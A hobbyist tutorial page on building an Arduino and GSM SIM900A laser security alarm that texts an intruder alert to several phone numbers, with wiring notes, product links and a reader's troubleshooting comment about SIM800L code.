This is too much for what should be (is, today) a simple configuration
class. I'd rather keep what we have today.
Maybe we can somehow simplify the patch while enabling strong type
checking of what's live and what isn't? Or, we can enable the type
checking, but dynamically at runtime; this way at least you'd get an
exception if you tried to change something. Or, stop chainging (return
void from all setters)... then the subclassing is straightforward. Or,
we simply improve javadocs. All of these options would be an
improvement.
Or, we just keep what we have today... changing live settings is an
expert use case. We shouldn't make our code more complex for it.
You've already done the hardest part here (figuring out what is live and
what isn't)!
Sorry if it came across like that, but I don't mean to rush or shove this issue in. I'm usually after consensus and I appreciate your feedback.
I took another look at this, and found a solution without generics. Funny thing is, that's the first solution that came to my mind, but I guess at the time it didn't picture well enough, so I discarded it
.
Now we have only LiveConfig and IndexWriterConfig, where IWC extends LC and overrides all setter methods. The "live" setters are overridden just to return IWC type, and call super.setXYZ(). So we don't have code dup, and whoever has IWC type at hand, will receive IWC back from all set() methods.
LC is public class but with package-private ctors, one that takes IWC (used by IndexWriter) and one that takes Analyzer+Version, to match IWC's. It contains all "live" members as private, and the others as protected, so that IWC can set them. Since it cannot be sub-classed outside the package, this is 'safe'.
The only thing that bothers me, and I'm not sure if it can be fixed, but this is not critical either, is TestIWC.testSettersChaining(). For some reason, even though I override the setters from LC in IWC, and set their return type to IWC, reflection still returns their return type as LiveConfig. This only affects the test, since if I do:
IndexWriterConfig conf;
conf.setMaxBufferedDocs(); // or any other set from LC
the return type is IWC.
If anyone knows how to solve it, please let me know, otherwise we'll just have to live with the modification to the test, and the chance that future "live" setters may be incorrectly overridden by IWC to not return IWC type That is not an error, just a convenience.
Besides that, and if I follow your comments and concerns properly, I think this is now ready to commit – there's no extra complexity (generics, 3 classes etc.), and with better compile time protection against misuse.
Hi Shai,
ignore all methods with isSynthetic() set (that are covariant overrides compatibility methods, access$xx() methods for access to private fields/ctors/...).
Thanks Uwe. The test is now fixed by saving all 'synthetic' methods and all 'setter' methods and verifying in the end that all of them were received from IWC too.
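The covariant-override approach, and the synthetic bridge methods that confuse reflection-based tests, can be sketched as follows (class names are illustrative, not Lucene's actual classes):

```java
import java.lang.reflect.Method;

class Live {
    double ramMB;
    Live setRAMBufferSizeMB(double mb) { this.ramMB = mb; return this; }
}

// Overrides the setter with a covariant return type and delegates to super,
// so callers holding the subclass type keep chaining on the subclass.
class Writer extends Live {
    @Override
    Writer setRAMBufferSizeMB(double mb) {
        super.setRAMBufferSizeMB(mb);
        return this;
    }
}

public class BridgeMethodDemo {
    public static void main(String[] args) {
        int bridges = 0, regular = 0;
        for (Method m : Writer.class.getDeclaredMethods()) {
            if (!m.getName().equals("setRAMBufferSizeMB")) continue;
            // The compiler emits an extra bridge method returning Live;
            // Method.isSynthetic()/isBridge() let reflection code skip it.
            if (m.isSynthetic()) bridges++; else regular++;
            System.out.println(m.getReturnType().getSimpleName()
                    + " synthetic=" + m.isSynthetic());
        }
        System.out.println(bridges + " bridge, " + regular + " regular");
    }
}
```

Filtering on isSynthetic() is exactly why the reflection test sees two setRAMBufferSizeMB methods on the subclass: the real override and the compiler-generated bridge.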
Can we override all methods so the javadocs aren't confusing.
I don't want the methods split in the javadocs between IWC and LiveConfig: LiveConfig is expert and should be a subset, not a portion.
Also can we rename it to LiveIndexWriterConfig? LiveConfig is too generic I think...
Can we override all methods so the javadocs aren't confusing.
Good idea! Done
Also can we rename it to LiveIndexWriterConfig?
Done
thanks, +1
Thanks Robert. I'll wait until Sunday and commit it.
Hmm we are no longer cloning the IWC passed into IW? Maybe we shouldn't remove testReuse?
Good catch Mike ! It went away in the last changes. I re-added testReuse, with asserting that e.g. the MP instances returned from LiveIWC are not the same.
I re-added testReuse, with asserting that e.g. the MP instances returned from LiveIWC are not the same.
Thanks!
Shouldn't clone() be protected in LiveIndexWriterConfig and public only in IndexWriterConfig?
Ie, users should never have any reason to clone the live config?
Shouldn't clone() be protected in LiveIndexWriterConfig and public only in IndexWriterConfig?
I guess you're right. In fact, I think that LiveIWC should not even be Cloneable, only IWC should? I'll take a look later when I'm near the code.
Patch removes Cloenable from LiveIWC. Now only IWC is Cloenable.
Committed revision 1351225 (trunk) and revision 1351229 (4x).
Thanks all for your comments !
CHANGES.txt is mangled
The 4.x commit also breaks the builds, looks like duplicate merges to same file.
The 4.x commit also breaks the builds, looks like duplicate merges to same file.
This was solved by cleaning workspace on Apache's Jenkins. Must have been a SVN problem.
bulk cleanup of 4.0-ALPHA / 4.0 Jira versioning. all bulk edited issues have hoss20120711-bulk-40-change in a comment
This should have been changed back to 'resolved' a long time ago. I guess I missed it.
I'm also nervous about documenting which things can/cannot be changed live unless there are unit tests for each one.
If we want to refactor indexwriter in some way that really cleans it up, but makes something "un-live", then I think
thats totally fair game and we should be able to do it, but the docs shouldnt be wrong. | https://issues.apache.org/jira/browse/LUCENE-4132?attachmentOrder=desc | CC-MAIN-2015-11 | refinedweb | 2,686 | 73.58 |
Question:
Consider the following code:
byte aBytes[] = { (byte)0xff, 0x01, 0, 0,
                  (byte)0xd9, (byte)0x65,
                  (byte)0x03, (byte)0x04,
                  (byte)0x05, (byte)0x06,
                  (byte)0x07, (byte)0x17,
                  (byte)0x33, (byte)0x74,
                  (byte)0x6f, 0, 1, 2, 3, 4, 5, 0 };
String sCompressedBytes = new String(aBytes, "UTF-16");
for (int i = 0; i < sCompressedBytes.length(); i++) {
    System.out.println(Integer.toHexString(sCompressedBytes.codePointAt(i)));
}
Gets the following incorrect output:
ff01, 0, fffd, 506, 717, 3374, 6f00, 102, 304, 500.
However, if the
0xd9 in the input data is changed to
0x9d, then the following correct output is obtained:
ff01, 0, 9d65, 304, 506, 717, 3374, 6f00, 102, 304, 500.
I realize that the functionality is because of the fact that the byte
0xd9 is a high-surrogate Unicode marker.
Question: Is there a way to feed, identify and extract surrogate bytes (
0xd800 to
0xdfff) in a Java Unicode string?
Thanks
Solution:1
Is there a way to feed, identify and extract surrogate bytes (0xd800 to 0xdfff) in a Java Unicode string?
Just because no one has mentioned it, I'll point out that the Character class includes the methods for working with surrogate pairs. E.g. isHighSurrogate(char), codePointAt(CharSequence, int) and toChars(int). I realise that this is besides the point of the stated problem.
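For illustration, here is a quick sketch of those Character helpers round-tripping a code point (U+10402 below is just an arbitrary supplementary-plane example, not from the question):

```java
public class SurrogateDemo {
    public static void main(String[] args) {
        int codePoint = 0x10402;                 // arbitrary supplementary-plane character
        char[] pair = Character.toChars(codePoint);

        // toChars() splits the code point into its high/low surrogate pair...
        System.out.println(Character.isHighSurrogate(pair[0])); // true
        System.out.println(Character.isLowSurrogate(pair[1]));  // true

        // ...and codePointAt() reassembles it from a CharSequence.
        String s = new String(pair);
        System.out.printf("%x%n", s.codePointAt(0));            // 10402
    }
}
```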
new String(aBytes, "UTF-16");
This is a decoding operation that will transform the input data. I'm pretty sure it is not legal because the chosen decoding operation requires the input to start with either 0xfe 0xff or 0xff 0xfe (the byte order mark). In addition, not every possible byte value can be decoded correctly because UTF-16 is a variable width encoding.
If you wanted a symmetric transformation of arbitrary bytes to String and back, you are better off with an 8-bit, single-byte encoding because every byte value is a valid character:
Charset iso8859_15 = Charset.forName("ISO-8859-15");
byte[] data = new byte[256];
for (int i = Byte.MIN_VALUE; i <= Byte.MAX_VALUE; i++) {
    data[i - Byte.MIN_VALUE] = (byte) i;
}
String asString = new String(data, iso8859_15);
byte[] encoded = asString.getBytes(iso8859_15);
System.out.println(Arrays.equals(data, encoded));
Note: the number of characters is going to equal the number of bytes (doubling the size of the data); the resultant string isn't necessarily going to be printable (containing as it might, a bunch of control characters).
I'm with Jon, though - putting arbitrary byte sequences into Java strings is almost always a bad idea.
Solution 2:
EDIT: This addresses the question from the comment
If you want to encode arbitrary binary data in a string, you should not use a normal text encoding. You don't have valid text in that encoding - you just have arbitrary binary data.
Base64 is the way to go here. There's no base64 support directly in Java (in a public class, anyway) but there are various 3rd party libraries you can use, such as the one in the Apache Commons Codec library.
Yes, base64 will increase the size of the data - but it'll allow you to decode it later without losing information.
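(A side note from a later vantage point: since Java 8, java.util.Base64 ships in the standard library, so the round trip no longer needs a third-party codec. A minimal sketch:)

```java
import java.util.Arrays;
import java.util.Base64;

public class Base64RoundTrip {
    public static void main(String[] args) {
        byte[] data = { (byte) 0xff, 0x01, 0x00, (byte) 0xd9, 0x65 }; // arbitrary binary data
        String encoded = Base64.getEncoder().encodeToString(data);
        byte[] decoded = Base64.getDecoder().decode(encoded);
        System.out.println(encoded);                      // /wEA2WU=
        System.out.println(Arrays.equals(data, decoded)); // true
    }
}
```

The encoded form is pure ASCII, so it survives any text channel that would mangle raw bytes.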
EDIT: This addresses the original question
I believe that the problem is that you haven't specified a proper surrogate pair. You should specify bytes representing a high surrogate and then a low surrogate. After that, you should be able to extract the appropriate code point. In your case, you've given a high surrogate on its own.
Here's code to demonstrate this:
public class Test {
    public static void main(String[] args) throws Exception // Just for simplicity
    {
        byte[] data = {
            0, 0x41,        // A
            (byte) 0xD8, 1, // High surrogate
            (byte) 0xDC, 2, // Low surrogate
            0, 0x42,        // B
        };

        String text = new String(data, "UTF-16");
        System.out.printf("%x\r\n", text.codePointAt(0));
        System.out.printf("%x\r\n", text.codePointAt(1));
        // Code point at 2 is part of the surrogate pair
        System.out.printf("%x\r\n", text.codePointAt(3));
    }
}
Output:
41
10402
42
I have a twill script that I am trying to use to get the HTML code from a web page and output it to a text file. The problem I have is that not all of the code shows up in my text file; the actual parts I need are left out. When I go to the web page manually and do "View, Page Source" I can see all the information. Here is a sample of the script I am using (website, username and password have been changed).
import twill, string, os
import csv
import urllib2
from twill import get_browser
b = get_browser()
from twill.commands import *
b.go ("")
username="user"
password="password"
formvalue ("form1", "name", username)
formvalue ("form1", "password", password)
b.submit()
b.go ("")
redirect_output ("c:\\testhtml.txt")
html = b.get_html()
print html
Does anyone know what the problem is? | https://www.daniweb.com/programming/software-development/threads/289749/twill-get-html | CC-MAIN-2016-50 | refinedweb | 138 | 75.4 |
squid3_sentry
squid3 redirect_program
a redirect_program for squid3 (like squidGuard, but more flexible)
Highlights
- Pure Javascript
- Easily extendable
- Rich set of predefined rule templates
- LDAP compatible
- Dynamic rule injection (no reload necessary)
Dependencies
- Node.js
- Squid3
- Optional: LDAP Server (squid with user auth. e.g. ntlm)
- Optional: Redis Server (dynamic rules and large domains lists e.g. shallalist)
Install sentry
Install Sentry globally:
npm install squid3_sentry -g
Or install it locally:
npm install squid3_sentry
Configuration (sentry)
via params
For a list of all params run
$ sentry --help
via config file
Config files need to be written in json (See examples folder)
Params:
name: The name of your instance. This is optional if you just have one squid instance!
redirect: The url to redirect the user if something is blocked
mode: Global mode, either redirector or rewrite. See mode in the rules definition.
log: Path to the log file. Bunyan is used as a logger.
log_level: Use error, warn or info. Default is error.
cache_time: Cache time in milliseconds. The cache will be cleared after that time (e.g. 300000 for 5 mins)
timeout: The timeout per request in milliseconds.
range: This will be used for the balancer only (See Balancer)
ldap url: The url to your ldap server (e.g. ldap://domain.local)
ldap dn: The path to the user which will query your ldap directory (e.g. CN=MyUser,CN=Users,DC=domain,DC=local)
ldap password: The password for that user
ldap base: The base path for all searches
redis host: url or domain of your redis host (e.g. localhost)
redis port: The port of your redis server
redis password: If you use redis authentication.
rule_sources: Array of sources. Currently only 'config' and 'redis' are available. The rules are positioned depending on the source position in the array
rules: Array of rule definitions. (only via config file)
for debugging:
measure_times: The amount of time for every request will be measured. The times are visible in the debugger (See Live Debugging)
dry_run: Runs sentry in test mode. Every request is allowed, but sentry still checks it's rules! (See Live Debugging)
Configuration (squid3)
Add the following to your squid.conf:

redirect_program sentry your/config/file.json
redirect_children 1
redirect_concurrency 100
Rules
The first rule that matches (i.e. all of its given criteria match) will be executed (Deny or Allow).
The following rule will deny all requests, and squid will redirect all http connections to the globally defined redirect address:
{ name: 'rule1', allowed: false }
To define a custom redirect address:
{ name: 'rule1', allowed: false, redirect: 'my.custom.redirec.com' }
The following configuration options are available:
name: Name of the rule (For debugging/verbose mode only). Default: rule
allowed: Deny or allow the url (e.g. black- or whitelist). Default: false
mode: Instead of redirecting a browser to another url (302 HTTP header) you could set it to rewrite, to tell squid to load another page instead of redirecting the browser
redirect: The redirect or rewrite url
Redirect config
You could use the following placeholders:
[url]: Current url
[domain]: Current Domain
[name]: Matching rule name
[ip]: IP of the incomming connection
[username]: Username of the incomming connection (if squid uses authentication)
[method]: HTTP method. e.g. GET, POST,..
Default criteria
You could configure your rules with any of the following criteria:
categories: Array of category names. A category is a list of domains and/or urls stored in redis. (See shallalist import)
category_files: Same as categories, but expects a file paths with domains and/or urls. These files will be stored in redis and watched for changes
file_types: Array of file types (e.g. ['swf', 'flv'])
ips: Array of ips (e.g. ['10.20.30.0/24', '10.55.11.33'])
matches: Array of wildcard matches (e.g. ['*goog*'])
groups: Array of LDAP groups. The full LDAP path is expected (e.g. ['CN=MyGroup,CN=Users,DC=domain,DC=local'])
users: Array of usernames
ous: Array of LDAP OUs. The full LDAP path is expected (e.g. ['OU=Development,DC=domain,DC=local'])
times: Array of objects in the following format: {from: '08:00', to:'17:00', week_day: 1}. The following params are available
- from: From time (24h)
- to: To time (24h)
- week_day: JS Date week day
- day
- month
- year
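Putting several of these criteria together, a complete rule entry in a config file might look like the following (the category name, group DN and redirect host are made up for illustration):

```json
{
  "name": "no_social_for_interns",
  "allowed": false,
  "redirect": "http://blocked.example/?url=[url]&rule=[name]",
  "categories": ["socialnet"],
  "groups": ["CN=Interns,CN=Users,DC=domain,DC=local"],
  "times": [{ "from": "08:00", "to": "17:00", "week_day": 1 }]
}
```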
Custom rule definitions
To extend sentry and add custom rules take a look at lib/rules/
Example rule which will deny every second request
Squid.start(config);

Squid.core.addRuleDefinition({
  name: 'my_rule_def',

  // will be called once for every rule - in the context of the rule.
  config: function(options){
    // This rule definition is active (filter will be called!)
    this.types.push('my_rule_def');
    this.allow_next = true;
  },

  // will be called for every request for every rule where my_rule_def is active
  filter: function(options, callback){
    // Return true if the rule definition matches.
    callback(null, this.allow_next);

    // Alternate every request
    this.allow_next = !this.allow_next;
  }
});

// Add a rule if there isn't any defined
Squid.core.addRule({
  allowed: false
});
Shallalist import
Use the import script to import shallalist into redis:
$ import path/to/shallalist
Live Debugging
Use the debugger script for live debugging:
$ debugger config.json
Balancer
Use the balancer script for round-robin style balancing.
The following command will start a balancer with 3 sentry processes:
$ balancer config.json config.json config.json
You can also use the balancer script to create a separate context for different subnets. E.g. 10.20.30.0/24 should have a different set of rules than 192.168.0.0/24. Create a config file for every subnet, put the subnet definition into the range config option, and start the balancer with the following command:
$ balancer subnet1.json subnet2.json | https://www.npmjs.org/package/squid3_sentry | CC-MAIN-2014-15 | refinedweb | 954 | 56.86 |
by Nash Vail
Understanding Linear Interpolation in UI Animation
In traditional (hand-drawn) animation, a senior or key artist draws keyframes that define the motion.
An assistant, generally an intern or a junior artist, then draws the necessary inbetweens for the scene. The job of the assistant, also called an inbetweener, is to make transitions between key poses look smooth and natural.
Inbetweens are necessary since animations without them appear choppy. Unfortunately, drawing in-betweens is more or less grunt work. But it’s the twenty-first century, and we have computers that can handle this type of task.
Remember what teachers told you in grade school about computers being dumb? Computers need to be told the exact sequence of steps to perform an action. Today we’ll look at one such sequence of steps, or algorithm, that helps the computer draw necessary inbetweens to create a smooth animation.
I’ll be using HTML5 canvas and JavaScript to illustrate the algorithm. However, you’ll be able to read and understand the article even if you aren’t familiar with them.
Intent
Our goal is simple: to animate a ball from point A (startX, startY) to B (endX, endY).
If this scene were passed to a studio that does traditional animation, the senior artist would draw the following key poses…
…and then pass the drawing board to a junior artist to draw inbetweens like so.
For our situation, there is no animation studio nor do we have junior artists. All we have is a goal, a computer, and the ability to write some code.
Approach
The HTML code is simple; we only need one line.
<canvas id="canvas"></canvas>
This part of the JavaScript code (shown below) simply grabs <canvas/> from the Document Object Model (DOM), gets the context, and sets the width and height properties of the canvas to match the viewport.
const canvas = document.getElementById('canvas'),
      context = canvas.getContext('2d'),
      width = canvas.width = window.innerWidth,
      height = canvas.height = window.innerHeight;
The function below draws a green solid circle of radius radius at the x and y coordinates.
function drawBall(x, y, radius) {
  context.beginPath();
  context.fillStyle = '#66DA79';
  context.arc(x, y, radius, 0, 2 * Math.PI, false);
  context.fill();
}
All of the above code is boilerplate to set up our animation, here’s the juicy part.
// Point A
let startX = 50,
    startY = 50;

// Point B
let endX = 420,
    endY = 380;

let x = startX,
    y = startY;

update();

function update() {
  context.clearRect(0, 0, width, height);
  drawBall(x, y, 30);
  requestAnimationFrame(update);
}
First of all, notice the update function being called right above its declaration. Second of all, notice requestAnimationFrame(update), which calls update repeatedly.
Flipbook animation is a good analogy for the kind of program we're writing. Just like repeatedly flipping through a flipbook creates the illusion of motion, repeatedly calling the update function creates the illusion of motion for our green ball.
One thing to note about the code above is that "update" is just a name. The function could have been named anything else. Some programmers like the names nextFrame, loop, draw, or flip because the function is repeatedly called. The important part is what the function does.
On each subsequent call of update, we expect the function to draw a slightly different image on the canvas than the previous one.
Our current implementation of update draws the ball at the same exact position on each call: drawBall(x, y, 30). There is no animation, but let's change that. Below is a pen that contains the code we have written so far; you can open it and follow along.
On each iteration of update, let's go ahead and increment the value of x and y and see the kind of animation it creates.
function update() {
  context.clearRect(0, 0, width, height);
  drawBall(x, y, 30);
  x++;
  y++;
  requestAnimationFrame(update);
}
Each iteration moves the ball forward in both the x and y directions, and repeated calls of update result in the animation as shown.
Here's the deal though: our intent was to move the ball from a start position to an end position. But we're doing absolutely nothing about stopping the ball at an end position. Let's fix that.
One obvious solution is to only increment the coordinates when they are smaller than the endX and endY values. This way, once the ball crosses (endX, endY), its coordinates will stop updating and the ball will stop.
function update() {
  context.clearRect(0, 0, width, height);
  drawBall(x, y, 30);
  if (x <= endX && y <= endY) {
    x++;
    y++;
  }
  requestAnimationFrame(update);
}
There’s an error in this approach though. Do you see it?
The problem here is that you cannot make the ball reach any end coordinate you want just by incrementing x and y values by 1. For example, consider end coordinates (500, 500). Of course, if you start at (0, 0) and add 1 to x and y, they will eventually get to (500, 500). But what if I chose (432, 373) as end coordinates?
Using the above approach, you can only reach points lying in a straight line 45 degrees from the horizontal axis.
Now you can use trigonometry and fancy math to calculate precise amounts that x and y should be incremented by to reach any coordinate you want. But you don't need to do that when you have linear interpolation.
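The 45-degree limitation is easy to check numerically: starting from (0, 0) and adding 1 to both coordinates only ever visits points where x equals y, so a target like (432, 373) gets missed:

```javascript
let x = 0, y = 0;
const endX = 432, endY = 373;

while (x < endX) { // walk the diagonal until we reach the target column
  x++;
  y++;
}
console.log(x, y);       // 432 432
console.log(y === endY); // false: y overshot the target row by 59
```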
Approach with linear interpolation
Here's what the linear interpolation function, a.k.a. lerp, looks like.
function lerp(min, max, fraction) {
  return (max - min) * fraction + min;
}
To understand what linear interpolation does, consider a slider with a min value on the left end and a max value on the right end.
The next thing we need to choose is fraction. lerp takes fraction and converts that to a value between min and max.
When I put 0.5 in the lerp formula — no surprises — it translates to 50. This is exactly the halfway point between 0 (min) and 100 (max).
Similarly, if we choose another value for fraction, say 0.85…
And if we let fraction = 0, lerp will output 0 (min), and on fraction = 1, lerp will produce 100 (max).
I chose 0 and 100 as min and max to keep this example simple, but lerp will work for any arbitrary choice of min and max.
For values of fraction between 0 and 1, lerp allows you to interpolate between min and max. Or in other words, traverse between min and max values, where choosing 0 for fraction puts you at min, choosing 1 puts you at max, and any other value between 0 and 1 puts you anywhere between min and max. You can also see min and max as key poses, like in traditional animation, and lerp outputs as inbetweens ;-).
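To make that concrete, here is lerp evaluated at the fractions used above:

```javascript
function lerp(min, max, fraction) {
  return (max - min) * fraction + min;
}

console.log(lerp(0, 100, 0));    // 0, the min
console.log(lerp(0, 100, 0.5));  // 50, the halfway point
console.log(lerp(0, 100, 0.85)); // 85
console.log(lerp(0, 100, 1));    // 100, the max

// Any min/max works, e.g. sliding between the startX and endX from earlier:
console.log(lerp(50, 420, 0.5)); // 235
```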
Alright, but what if someone gives a value outside the bounds of 0 and 1 as fraction to lerp? You see, the formula for lerp is extremely straightforward, using the most basic of mathematical operations. There's no trick or bad values here; just imagine extending the slider in both directions. Whatever value for fraction is supplied, lerp will produce a logical result. We shouldn't pay much thought to bad values here though; what we should think about is how all of this maps to animating the ball.
If you're following along, go ahead and change the update function to match the following code. Also don't forget to add in the lerp function we defined at the beginning of this section.
function update() {
  context.clearRect(0, 0, width, height);
  drawBall(x, y, 30);
  x = lerp(x, endX, 0.1);
  y = lerp(y, endY, 0.1);
  requestAnimationFrame(update);
}
Here’s a pen of what our program looks like now. Try clicking around :)
Smooth, right? Here's how lerp helps to improve the animation.
In the code, notice that the variables x and y — which are initially set to startX and startY — mark the current position of the ball in any frame. Also, my choice of 0.1 as fraction is arbitrary; you can choose any fractional value you want. Keep in mind that your choice of fraction affects the speed of the animation.
In every frame, x and endX are taken as min and max and interpolated with 0.1 as fraction to obtain a new value for x. Similarly, y and endY are used as min and max to obtain a new value for y, using 0.1 as fraction.
The ball is then drawn at the newly calculated (x, y) coordinate.
These steps are repeated until x becomes endX and y becomes endY, in which case min = max. When min and max become equal, lerp throws the exact same value (min/max) for any further frames, thus stopping the animation.
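You can watch the convergence happen numerically too. One practical wrinkle in this sketch: floating-point rounding can leave x a hair short of endX for a very long time, so the loop treats "within half a pixel" as arrived (startX = 50 and endX = 420 are the values used earlier):

```javascript
function lerp(min, max, fraction) {
  return (max - min) * fraction + min;
}

let x = 50;          // startX
const endX = 420;
let frames = 0;
while (Math.abs(endX - x) >= 0.5) { // "arrived" once within half a pixel
  x = lerp(x, endX, 0.1);
  frames++;
}
console.log(frames); // 63, since each frame closes 10% of the remaining gap
```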
And that is how you use linear interpolation to smoothly animate a ball.
This short article covers a lot. We started by defining terms like key poses and inbetweens. Then we tried a trivial approach for drawing inbetweens and noticed its limitations. Finally, with linear interpolation, we were able to achieve our intent.
I hope all the math made sense to you. Feel free to play with linear interpolation even more. This article was inspired by Rachel Smith’s post on CodePen. Rachel’s post has many more examples, be sure to check it out.
Looking for more? I publish regularly on my blog at nashvail.me. See you there, have a good one!
| https://www.freecodecamp.org/news/understanding-linear-interpolation-in-ui-animations-74701eb9957c/ | CC-MAIN-2019-43 | refinedweb | 1,573 | 65.73 |
I am doing a Craps program in my class. I think this is a very common program for beginners but it seems to be different everywhere I see it. All I need it to do is the user inputs the first total, it tells them if they win or lose, if not, it prompts a second total and checks for a winner. If it is not a winner, it prompts for another roll from the user until the user wins. I got my code to compile correctly but I have some problems.
Problem 1: If the first number is a winner or a loser, it prints "You win!!!" or "You Lose!!!" and then it does not end the program. I have to actually close the program myself.
Problem 2: If the first number is neither a winner nor a loser, it prompts for a second roll. If the second roll is the same as the first it says "You win!!!" If not, it should ask for another roll; instead it asks for another roll infinitely, and I have to close the program.
Here is my code, I have been working with it for a while and I would really appreciate any help.
Code:
// File: CRAPS.cpp
// Author: Emil
// Class: TR 5pm
// Purpose: To simulate a game of Craps given total on first dice roll
//          and possibly a second dice roll.
#include <iostream>
using namespace std;

int main()
{
    float first_total, second_total, roll_total;

    // Prompt for and read in total from first dice roll
    cout << "Enter total from first dice roll (2-12)... ";
    cin >> first_total;

    if((first_total == 7) || (first_total == 11))
        cout << "You Win!!!";
    else if((first_total == 2) || (first_total == 3) || (first_total == 12))
        cout << "You Lose!!!";
    else
        cout << "Please roll again and enter total of second roll (2-12): ";

    cin >> second_total;

    if(second_total == first_total)
        cout << "You win!!!";
    else if(second_total == 7)
        cout << "You lose!!!";
    else
        while ((second_total != 7) || (second_total == first_total))
            cout << "Please roll again and enter total on this roll (2-12): ";

    cin >> roll_total;
    second_total = roll_total;

    return (0);
}
src/test/cylinders.c
Stokes flow past a periodic array of cylinders
We compare the numerical results with the solution given by the multipole expansion of Sangani and Acrivos, 1982.
#include "embed.h"
#include "navier-stokes/centered.h"
#include "view.h"
This is Table 1 of Sangani and Acrivos, 1982, where the first column is the volume fraction of the cylinders and the second column is the non-dimensional drag force per unit length of cylinder with the dynamic vicosity and the average fluid velocity.
static double sangani[9][2] = {
  {0.05, 15.56},
  {0.10, 24.83},
  {0.20, 51.53},
  {0.30, 102.90},
  {0.40, 217.89},
  {0.50, 532.55},
  {0.60, 1.763e3},
  {0.70, 1.352e4},
  {0.75, 1.263e5}
};
We will vary the maximum level of refinement, nc is the index of the case in the table above, the radius of the cylinder will be computed using the volume fraction .
int maxlevel = 6, nc; double radius;
This function defines the embedded volume and face fractions.
void cylinder (scalar cs, face vector fs)
{
  vertex scalar φ[];
  foreach_vertex()
    φ[] = sq(x) + sq(y) - sq(radius);
  fractions (φ, cs, fs);
}

int main()
{
The domain is the periodic unit square, centered on the origin.
  size (1.);
  origin (-L0/2., -L0/2.);
  periodic (right);
  periodic (top);

  DT = 1e-3;
  TOLERANCE = HUGE;
  NITERMIN = 5;
We do the 9 cases computed by Sangani & Acrivos. The radius is computed from the volume fraction.
  for (nc = 0; nc < 9; nc++) {
    maxlevel = 6;
    N = 1 << maxlevel;
    radius = sqrt(sq(L0)*sangani[nc][0]/π);
    run();
  }
}
We need an extra field to track convergence.
scalar un[];

event init (t = 0)
{
We initialize the embedded geometry.
  cylinder (cs, fs);

And set the acceleration and viscosity.

  const face vector g[] = {1.,0.};
  a = g;
  mu = fm;
}

We then check at every timestep whether the horizontal velocity has converged.

event logfile (i++)
{
  double du = change (u.x, un);
  if (i > 0 && du < 1e-3) {
We output the non-dimensional force per unit length on the cylinder , together with the corresponding value from Sangani & Acrivos and the relative error.
    stats s = statsf(u.x);
    double Φ = 1. - s.volume/sq(L0);
    double U = s.sum/s.volume;
    double F = sq(L0)/(1. - Φ);
    fprintf (ferr, "%d %g %g %g %g\n",
             maxlevel, sangani[nc][0], F/U, sangani[nc][1],
             fabs(F/U - sangani[nc][1])/sangani[nc][1]);
We dump the simulation and draw the mesh for one of the cases.
    dump();
    if (maxlevel == 9 && nc == 8) {
      view (fov = 9.78488, tx = 0.250594, ty = -0.250165);
      draw_vof ("cs", "fs", lc = {1,0,0}, lw = 2);
      squares ("u.x", linear = 1, spread = -1);
      cells();
      save ("mesh.png");
    }
We stop at level 9.
    if (maxlevel == 9)
      return 1; /* stop */
We refine the converged solution to get the initial guess for the finer level. We also reset the embedded fractions to avoid interpolation errors on the geometry.
    maxlevel++;
#if 0
    refine (level < maxlevel);
#else
    adapt_wavelet ({cs,u}, (double[]){1e-2,2e-6,2e-6}, maxlevel);
#endif
    cylinder (cs, fs);
  }
}
The non-dimensional drag force per unit length closely matches the results of Sangani and Acrivos, 1982. For the largest volume fraction and level 8 there are only about 6 grid points across the width of the gap between cylinders.
Non-dimensional drag force per unit length
This can be further quantified by plotting the relative error. It seems that at low volume fractions, the error is independent from the mesh refinement. This may be due to other sources of errors, such as the splitting error in the projection scheme. This needs to be explored further.
Relative error on the drag force
The adaptive mesh for 9 levels of refinement illustrates the automatic refinement of the narrow gap between cylinders.
Adaptive mesh at level 9. | http://basilisk.fr/src/test/cylinders.c | CC-MAIN-2018-43 | refinedweb | 591 | 64.71 |
Brian Paul <brianp@...> wrote:
> OK, here's what I've found. It's basically a version problem between
> the DRM code that's in the DRI trunk vs the 2.4.0 kernel.
>
> Evidently the DRM code on the DRI trunk was updated for kernel 2.4.3
> and that broke compatibility with 2.4.[012].
>
> This was probably announced on the mailing list, but I must have missed it.
>
> Here's a description of the problem. When compiling radeon_drv.c there
> are some warnings:
[snip]
> Alan (or anyone more familiar with kernel stuff), is this an acceptable
> patch?
This will break for 2.4.2-ac22 through -ac28 now ... I upgraded from
-ac17 to -ac28 to get the kernel module to build and work :)
AFAIK (I will check) I need the -ac series to have the AGP stuff work
reliably with my ALi 1541 chipset ...
/me goes away to bang head on desk ...
> -Brian
--
/* Bill Crawford, Unix Systems Developer, Ebone (formerly GTS Netcom) */
#include <stddiscl>
const char *addresses[] = {
"bill@...", "Bill.Crawford@...", // work
"billc@...", "bill@..." // home
}; | https://sourceforge.net/p/dri/mailman/message/12631022/ | CC-MAIN-2018-09 | refinedweb | 175 | 76.82 |
I've recently started learning Swift and SpriteKit. I am currently trying to do the basics and was trying to fit a background image onto the screen. I have managed to get the background picture up and in the centre of the screen, but it is not filling up the whole screen. All help would be appreciated.
import SpriteKit

class GameScene: SKScene {

    override func didMoveToView(view: SKView) {
        /* Setup your scene here */
        let bgImage = SKSpriteNode(imageNamed: "background.png")
        bgImage.position = CGPoint(x: self.size.width/2, y: self.size.height/2)
        bgImage.anchorPoint = CGPointMake(0.5, 0.5)
        bgImage.zPosition = -1
        self.addChild(bgImage)
    }
}
You can change the size of your sprite to fit the size of the scene:
bgImage.size = self.size
Of course if the proportions of the scene are different from the proportions of the sprite, the sprite will be stretched.
Thank you to @Knight0fDragon for the helpful comments below. | https://codedump.io/share/F4mDETTTjNlL/1/swift-spritekit-background-image | CC-MAIN-2016-50 | refinedweb | 153 | 66.64 |
Hi there,
I'm trying to create a simple program that creates a 2D array of numbers and prints them to the screen via a function. I think I have got most of the way; however, I can't seem to get the print function to print correctly. It's been a while since I coded in C. Can anyone see where I have slipped up?
#include <stdio.h>
#include <stdlib.h>

#define START 0
#define MAX 128

void printarray(int *, int);

int main(int argc, char *argv[])
{
    int i, j, c;
    int vig[MAX][MAX];

    for (i = 0; i < MAX; i++)
    {
        c = START + i;
        for (j = 0; j < MAX; j++)
        {
            if (c < MAX)       /* This section is a simple loop that initiates a Vigenère Table */
            {                  /* into an array called "vig". This array will be used in the    */
                vig[i][j] = c; /* encryption/decryption process later on.                       */
                c++;
            }
            else
            {
                c = START;
                vig[i][j] = c;
                c++;
            }
        }
    }

    printarray(&vig[0][0], MAX);

    system("PAUSE");
    fclose(input);
    return 0;
}

void printarray(int *vig1, int n)
{
    int i, j, x;
    int vig2[MAX][MAX];

    vig1 = &vig2[MAX][MAX];

    for (i = 0; i < MAX; i++)
    {
        for (j = 0; j < MAX; j++)
